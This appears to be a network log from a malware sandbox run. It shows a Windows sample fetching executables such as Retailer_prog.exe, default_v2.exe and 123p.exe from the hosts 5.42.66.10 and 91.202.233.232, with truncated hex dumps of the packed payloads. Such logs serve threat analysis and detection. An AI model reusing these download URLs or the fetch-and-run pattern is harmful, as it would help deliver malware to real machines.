May 24, 2024 09:42:05.757208109 CEST	448	IN	Data Raw: 1e 45 7e 03 ef 7e 0b 54 a6 73 73 63 fe fe 6e f3 8a eb 0d 01 dd 8e 01 c8 24 81 1f 20 a5 fa 49 2d 81 19 fe 45 50 ce 4c c7 c2 b0 57 fe 8d 22 4f c4 bf d9 88 fe ce 22 fe fa 53 d9 f9 32 a7 e6 08 a4 0b 19 a8 26 1e 35 41 f2 79 17 fe fb 03 d4 86 4b 0a 14 Data Ascii: E~~Tsscn$ I-EPLW"O"S2&5AyK h)\|?)h"m-/\$nL4${hdo@Xhp#h\|5?XG\|\U*PW.re{.$ywpwp`'r Cw\0m]M\|4lu
May 24, 2024 09:42:05.757426977 CEST	1236	IN	Data Raw: 00 8b 44 25 00 e9 41 90 22 00 ed 89 b3 54 15 1d 71 b2 d8 10 45 7d d0 12 50 b8 e5 bd 38 1a c8 c0 75 0d 00 c2 69 a0 cc b5 89 6a d9 10 85 e4 e4 75 f2 55 6b 00 00 00 80 74 5f 52 9f 2d aa aa 94 ff ff ff 7f e7 65 af c4 ff b4 2f dd d9 8d e9 35 16 25 08 Data Ascii: D%A"TqE}P8uijuUkt_R-e/5%p$4.1KB8/S4F\|>>2'cTk;$Rib40NbmOb-0+-/'m1@".~_kQmkR'
May 24, 2024 09:42:05.758922100 CEST	1236	IN	Data Raw: f1 31 85 8c 09 4d 14 de f1 1b 1b e9 f2 f4 53 df 10 af dc 35 6c 77 43 1a 11 2e 91 f1 5c d7 f1 1c 6c c3 fc 8e a6 ff dd 84 42 f1 8f 13 ea 92 cb 21 c0 b6 33 66 61 49 1e 15 13 c0 c7 df d8 e2 6e 39 11 46 07 58 c2 ac 5a cf 46 b3 81 27 89 73 59 1a 8f bc Data Ascii: 1MS5lwC.\lB!3faIn9FXZF'sYqmbtK7(fh&vH[^-o*R]B{cYDSAdYk7v\|6f)W~2>.NCjl7~.d$GyFOSk1Ih
May 24, 2024 09:42:08.474710941 CEST	208	OUT	GET /download/th/retail.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 5.42.66.10 Cache-Control: no-cache
May 24, 2024 09:42:08.692173004 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 24 May 2024 07:42:08 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Description: File Transfer Content-Disposition: attachment; filename=Retailer_prog.exe Content-Transfer-Encoding: binary Expires: 0 Cache-Control: must-revalidate Pragma: public Content-Length: 3063296 Content-Type: application/octet-stream Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 14 69 4c 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 27 00 bc 15 00 00 8c 18 00 00 00 00 00 0c a0 2d 00 00 10 00 00 00 d0 15 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 6e 00 00 04 00 00 8a c8 2e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3c 14 2e 00 2c 01 00 00 00 80 59 00 02 26 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 59 00 38 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 98 3c 00 18 00 00 00 10 50 59 00 40 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELiLf'-@n.@<.,Y&`Y8@<PY@;@.text `.rdata2~@@.data0IP@.vmp) `.vmp@.vmpw.*x. `.reloc8`Y.@@.rsrc&Y .@@
May 24, 2024 09:42:10.793076992 CEST	207	OUT	GET /download/th/space.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 5.42.66.10 Cache-Control: no-cache
May 24, 2024 09:42:11.018929958 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 24 May 2024 07:42:10 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Description: File Transfer Content-Disposition: attachment; filename=default_v2.exe Content-Transfer-Encoding: binary Expires: 0 Cache-Control: must-revalidate Pragma: public Content-Length: 3098112 Content-Type: application/octet-stream Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 14 69 4c 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 27 00 bc 15 00 00 8c 18 00 00 00 00 00 00 65 2d 00 00 10 00 00 00 d0 15 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 6f 00 00 04 00 00 71 72 2f 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f8 8c 4b 00 2c 01 00 00 00 20 5a 00 02 26 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5a 00 14 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 50 45 00 18 00 00 00 70 f6 59 00 40 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELiLf'e-@Poqr/@K, Z&ZPEpY@`0+@.text `.rdata2~@@.data0IP@.vmplI `.vmp@.vmp@.+/ `.relocZ/@@.rsrc& Z &/@@

Timestamp	Bytes transferred	Direction	Data
May 24, 2024 09:42:04.431699038 CEST	204	OUT	HEAD /download/123p.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 5.42.66.10 Cache-Control: no-cache
May 24, 2024 09:42:05.100295067 CEST	276	IN	HTTP/1.1 200 OK Date: Fri, 24 May 2024 07:42:04 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Thu, 02 May 2024 09:42:48 GMT ETag: "ae0000-617756d063600" Accept-Ranges: bytes Content-Length: 11403264 Content-Type: application/x-msdownload
May 24, 2024 09:42:05.100584984 CEST	209	OUT	HEAD /download/th/retail.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 5.42.66.10 Cache-Control: no-cache
May 24, 2024 09:42:05.329873085 CEST	395	IN	HTTP/1.1 200 OK Date: Fri, 24 May 2024 07:42:05 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Description: File Transfer Content-Disposition: attachment; filename=Retailer_prog.exe Content-Transfer-Encoding: binary Expires: 0 Cache-Control: must-revalidate Pragma: public Content-Length: 3063296 Content-Type: application/octet-stream
May 24, 2024 09:42:05.330550909 CEST	203	OUT	GET /download/123p.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 5.42.66.10 Cache-Control: no-cache
May 24, 2024 09:42:05.563534975 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 24 May 2024 07:42:05 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Thu, 02 May 2024 09:42:48 GMT ETag: "ae0000-617756d063600" Accept-Ranges: bytes Content-Length: 11403264 Content-Type: application/x-msdownload Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 0a 00 e2 5f 33 66 00 00 00 00 00 00 00 00 f0 00 23 00 0b 02 0e 00 00 80 00 00 00 2c ca 00 00 00 00 00 60 8b fa 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 a5 01 00 04 00 00 00 00 00 00 02 00 20 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 30 36 91 01 64 00 00 00 00 90 a5 01 58 2c 00 00 00 59 a5 01 fc 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 8a 8c 01 28 00 00 00 c0 57 [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEd_3f#,`@ 06dX,Y*(W8h.text~ `.rdata@@.data@.pdata@@.00cfg@@.tls@.text0, `.text18@.text2`h.rsrcX,.@@
May 24, 2024 09:42:05.564522982 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8c 99 89 01 00 00 00 00 00 00 00 00 00 00 00 00 ca 6a Data Ascii: jjEfD_0,
May 24, 2024 09:42:05.564557076 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
May 24, 2024 09:42:05.566586971 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 9:6.L0>2&V>bKQogsl!)HOKRgK7c=J\| }uBCH=aoAiut5
May 24, 2024 09:42:05.566620111 CEST	256	IN	Data Raw: 79 cd 43 10 3e 17 a7 7c 81 1b a3 7b 64 c0 26 12 44 33 67 40 b6 31 23 6f 1e bc dc b9 d5 5d 9b a3 eb db b9 71 78 5c 15 48 93 dd d9 e0 43 23 17 0b b3 fd 5d 14 24 67 9f dd 5d 51 86 96 b5 89 fc f0 45 ce 95 3a 7a 72 50 0a f3 b4 5a 8a 38 0a f3 b4 62 8a Data Ascii: yC>\|{d&D3g@1#o]qx\HC#]$g]QE:zrPZ8b(jjB@Rc8 ; L\l[[g7-#9cAJCzu[ad? n??$??\|Ekti(:OoGe=
May 24, 2024 09:42:05.670521021 CEST	1236	IN	Data Raw: 49 ce b4 f9 3b d3 13 4d 9b 26 b3 f7 97 81 c8 f5 4c 6b ff cb 3f 61 8a f3 70 85 8e 7e 33 21 13 17 02 47 de d8 44 97 59 7d d0 ba 42 da 7e 13 db cc e4 c3 54 e1 8a 58 a1 f5 c8 28 7e d8 a3 de 5c e8 66 d8 a3 de 48 f0 36 d8 a3 de 04 f0 6e d8 a3 de b4 84 Data Ascii: I;M&Lk?ap~3!GDY}B~TX(~\fH6n,L'<HpN,HD$ F:4t$Hd$ :meI;)g&OKK=oK%wKU5KOKL)hS\|<,2rPMRb2L<H
May 24, 2024 09:42:05.670614004 CEST	64	IN	Data Raw: 3a 13 5b 99 04 f3 b4 73 6b a9 04 f3 b4 0b 0b 19 46 ce b4 85 34 9f 37 d9 94 26 b3 0b ab 99 fa 0c 4b 8b d3 71 fa 0c 4b f3 83 31 fa 0c 4b 4b 03 99 8e 62 4b e4 b6 af 61 1b 5f 73 98 ff a6 33 85 a2 Data Ascii: :[skF47&KqK1KKbKa_s3
May 24, 2024 09:42:05.670630932 CEST	1236	IN	Data Raw: e0 7a 45 61 0e 62 92 f7 d1 68 e0 42 93 15 b8 66 e1 9b eb 61 61 05 47 ba 17 70 b5 79 0f ba 17 70 e9 05 77 ba 17 70 a9 c9 f7 ba 17 70 d1 e5 9c 47 87 b5 24 ef 7d 25 c4 ea a4 7f 67 61 44 e8 8f b3 e3 51 44 e8 8f 63 97 8a b9 98 b2 bf 85 6f 4d 80 99 c0 Data Ascii: zEabhBfaaGpypwppG$}%gaDQDcoM:DF4&.dK1K TjLV\|,E>YN;w_{~ [Ai9GF\ W8DZV2Elp*p[UC0x
May 24, 2024 09:42:05.670644045 CEST	224	IN	Data Raw: a6 ef 79 05 ba 41 90 a3 0b 0f a8 54 a6 62 f3 8f fa 3f 5d 3b 4e a1 b2 b5 e2 28 bb ce 38 5d c9 a5 47 15 37 2b cf af 7a 2e 01 4a 74 45 fb 59 85 19 34 bb 58 8c 5b 4b 37 82 45 e9 f7 1b b8 94 99 b2 fd 20 c9 d8 4d ea 85 03 4e 0d b7 a2 fa 59 8c 5b 4b 3c Data Ascii: yATb?];N(8]G7+z.JtEY4X[K7E MNY[K<I>y}X({\|zN{GDpGM{D>qz>-SpN@qRKkSdp`o&.=lQ?6^<=,Dt])Swc4
May 24, 2024 09:42:05.671477079 CEST	1236	IN	Data Raw: 94 7a 5e aa 94 3f ad 77 0b 97 8a bd 93 f4 13 58 d9 54 07 a7 98 ab d7 f2 a4 d1 b2 d5 dc 61 7f ed 92 90 3a 1e 4f 0f 2a 39 85 97 4a 2c 61 47 14 c0 70 9d 4c a4 d8 19 23 8a c7 d0 13 39 7e a5 e8 dd 56 92 68 2e 55 97 a8 b6 56 a2 0f 5c fb 7a b1 88 ae 57 Data Ascii: z^?wXTa:O9J,aGpL#9~Vh.UV\zWFbG_>rD?)dK>{-5;{y!}-s7y<*zm1z8Fhol188lq~y]VlbEM:RuPWb/0PydK:E$tYK
May 24, 2024 09:42:05.672252893 CEST	1236	IN	Data Raw: 67 80 7c 3b 24 97 54 67 80 1a 3a 14 08 3b 0b 56 93 db 83 5f ef 24 3a 06 dc 43 56 30 66 6a f4 b9 2f 49 e4 60 79 ac fa 84 d8 40 b6 be 78 e1 80 6d 48 06 f6 6e 6d e0 ce d3 bb 0c 5f b6 10 a7 0e 0d c4 0d ea e1 ab 67 bf f2 30 5b 6c d3 74 3b 4c ff 3c 92 Data Ascii: g\|;$Tg:;V_$:CV0fj/I`y@xmHnm_g0[lt;L<^9W{ZN9fFAP5w.Z!aWGmDOv(A-aZoA0VX!?#:~*7My$2nmBaxa {oWD0tGG\|

Timestamp	Bytes transferred	Direction	Data
May 24, 2024 09:42:04.441860914 CEST	223	OUT	HEAD /o2i3jroi23joj23ikrjokij3oroi.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 91.202.233.232 Cache-Control: no-cache
May 24, 2024 09:42:05.187546968 CEST	254	IN	HTTP/1.1 200 OK Date: Fri, 24 May 2024 07:42:05 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Fri, 24 May 2024 07:36:31 GMT ETag: "271a00-6192e39e89dc0" Accept-Ranges: bytes Content-Length: 2562560 Content-Type: application/x-msdos-program
May 24, 2024 09:42:05.188239098 CEST	222	OUT	GET /o2i3jroi23joj23ikrjokij3oroi.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 91.202.233.232 Cache-Control: no-cache
May 24, 2024 09:42:05.445055008 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 24 May 2024 07:42:05 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Fri, 24 May 2024 07:36:31 GMT ETag: "271a00-6192e39e89dc0" Accept-Ranges: bytes Content-Length: 2562560 Content-Type: application/x-msdos-program Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 96 0f 00 00 80 17 00 00 00 00 00 98 a4 0f 00 00 10 00 00 00 b0 0f 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 [TRUNCATED] Data Ascii: MZP@!L!This program must be run under Win32$7PEL^B*@'@"p0H6 CODE `DATA @BSS.idata"$@.tls.rdata @P.relocH608@P.rsrcp@P''@P
May 24, 2024 09:42:05.445103884 CEST	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 40 00 03 07 42 6f 6f 6c 65 61 6e 01 00 00 00 00 01 00 00 00 00 10 40 00 05 46 61 6c 73 65 04 54 72 75 65 8d 40 00 Data Ascii: @Boolean@FalseTrue@,@WideCharD@CharX@Shortintp@Smallint@Integer@Byte@
May 24, 2024 09:42:05.445146084 CEST	1236	IN	Data Raw: 57 6f 72 64 03 00 00 00 00 ff ff 00 00 90 c8 10 40 00 04 08 45 78 74 65 6e 64 65 64 02 90 d8 10 40 00 01 08 43 61 72 64 69 6e 61 6c 05 00 00 00 00 ff ff ff ff 90 f0 10 40 00 10 05 49 6e 74 36 34 00 00 00 00 00 00 00 80 ff ff ff ff ff ff ff 7f 90 Data Ascii: Word@Extended@Cardinal@Int64@Single@@Double@,@Real8@CompD@CurrencyT@ShortStringh@ByteBoold@FalseTrue@WordBool@F
May 24, 2024 09:42:05.449086905 CEST	1236	IN	Data Raw: 8b c0 ff 25 bc e1 4f 00 8b c0 ff 25 b8 e1 4f 00 8b c0 ff 25 b4 e1 4f 00 8b c0 ff 25 b0 e1 4f 00 8b c0 ff 25 ac e1 4f 00 8b c0 ff 25 a8 e1 4f 00 8b c0 ff 25 a4 e1 4f 00 8b c0 ff 25 a0 e1 4f 00 8b c0 ff 25 9c e1 4f 00 8b c0 ff 25 98 e1 4f 00 8b c0 Data Ascii: %O%O%O%O%O%O%O%O%O%O%O%O%O%O%O%O%O%O%O%O%O%O%O%\|O%xO%tOSTYD$,t\$0D[
May 24, 2024 09:42:05.449100018 CEST	1236	IN	Data Raw: 10 00 00 2b fb 57 53 e8 26 fc ff ff 85 c0 75 0a 8b 44 24 04 33 d2 89 10 eb 0a 8b 36 81 fe ec d5 4f 00 75 bc 83 c4 0c 5d 5f 5e 5b c3 8b c0 53 56 57 55 51 8b d8 8b f3 81 c6 ff 0f 00 00 81 e6 00 f0 ff ff 89 34 24 8b eb 03 ea 81 e5 00 f0 ff ff 8b 04 Data Ascii: +WS&uD$36Ou]_^[SVWUQ4$$+$A5O8^~;$s$;s;vh@+WSuO6OuZ]_^[@SVWUO?]3;{,C>tPFCF)C{
May 24, 2024 09:42:05.453861952 CEST	1236	IN	Data Raw: c1 f9 02 8b 1d 24 d6 4f 00 89 54 8b f4 8b 00 89 02 89 50 04 5b c3 8b 00 89 02 89 50 04 5b c3 8d 40 00 8b 15 28 d6 4f 00 eb 10 8b 4a 08 3b c1 72 07 03 4a 0c 3b c1 72 16 8b 12 81 fa 28 d6 4f 00 75 e8 c7 05 c8 d5 4f 00 03 00 00 00 33 d2 8b c2 c3 90 Data Ascii: $OTP[P[@(OJ;rJ;r(OuO3S\|[\|[OO\|\| SVtO
May 24, 2024 09:42:05.453918934 CEST	1236	IN	Data Raw: 8b f2 3b 1f 75 05 8b 43 04 89 07 8b c3 03 c6 83 20 fe 8b c3 8b d6 83 ca 02 89 10 83 c0 04 ff 05 b4 d5 4f 00 83 ee 04 01 35 b8 d5 4f 00 5d 5f 5e 5b c3 55 8b ec 83 c4 f8 53 56 57 8b d8 80 3d c4 d5 4f 00 00 75 09 e8 fb f8 ff ff 84 c0 74 08 81 fb f8 Data Ascii: ;uC O5O]_^[USVW=Out~3ET3Uh%@d1d!=MOthO }y$OTty B;uy$O3\|&y=$O
May 24, 2024 09:42:05.453950882 CEST	1236	IN	Data Raw: 24 0c 7c 0e 8b c5 03 c6 8b 14 24 e8 6e f8 ff ff eb 3a 03 34 24 8b dd 03 de 83 23 fe eb 2e 8b 03 a9 00 00 00 80 74 21 25 fc ff ff 7f 03 c3 8b d8 8b 54 24 04 8b c3 e8 cf f9 ff ff 84 c0 74 09 8b dd 03 df e9 0d ff ff ff 33 c0 eb 19 8b c6 2b c7 01 05 Data Ascii: $\|$n:4$#.t!%T$t3+OE%uYZ]_^[UQSVW=Ouu3E3Uh)@d2d"=MOthOt]6%;}t:
May 24, 2024 09:42:05.458093882 CEST	1236	IN	Data Raw: e1 ff 00 00 00 92 e8 4f fe ff ff 5b c3 90 53 56 57 89 c6 89 d7 31 c0 31 d2 8a 06 8a 17 46 47 29 d0 77 02 01 c2 52 c1 ea 02 74 26 8b 0e 8b 1f 39 d9 75 44 4a 74 15 8b 4e 04 8b 5f 04 39 d9 75 37 83 c6 08 83 c7 08 4a 75 e2 eb 06 83 c6 04 83 c7 04 5a Data Ascii: O[SVW11FG)wRt&9uDJtN_9u7JuZt:u/JtN:Ou$JtN:OuZ8u8u8u8_^[SVQt&9uENtHZ9u8Nu^t6:u0NtH:Ju%NtH:Ju1^[^8u8u
May 24, 2024 09:42:05.458127975 CEST	1236	IN	Data Raw: e9 07 9c 8a f2 64 45 d4 f3 f7 eb e1 4a 7a 95 cf 45 62 a2 95 07 dc d8 3e b8 39 46 c7 91 0e a6 ae a0 19 e3 a3 46 17 0c 75 81 86 75 76 c9 48 4d e4 a7 93 39 3b 35 b8 b2 ed 53 e5 5d 3d c5 5d 3b 8b 9e 92 5a a6 f0 a1 20 c0 54 a5 8c 37 61 8b 5a 8b d8 25 Data Ascii: dEJzEb>9FFuuvHM9;5S]=];Z T7aZ%]g']n R`%uYnb5{%OS3juj%=t=u[U OEEPjjh3@huM3Uh3@d0d EEP
May 24, 2024 09:42:05.461702108 CEST	1236	IN	Data Raw: 02 8b 00 8b 70 cc 85 f6 74 15 66 8b 3e 83 c6 02 8a 4e 06 38 d9 74 15 66 8b 0e 01 ce 4f 75 f1 8b 40 dc 85 c0 75 db eb 18 8a 1a eb eb b5 00 8a 5c 31 06 32 1c 11 80 e3 df 75 ee 49 75 f1 8b 46 02 5f 5e 5b c3 8b c0 53 56 57 31 c9 31 ff 8a 1a 50 8b 00 Data Ascii: ptf>N8tfOu@u\12uIuF_^[SVW11Pptf>N8tt1Ou@uZN\12uIuZ_^[RQS\|P1L$diA8@Ad[YZND$,@tPQX@RS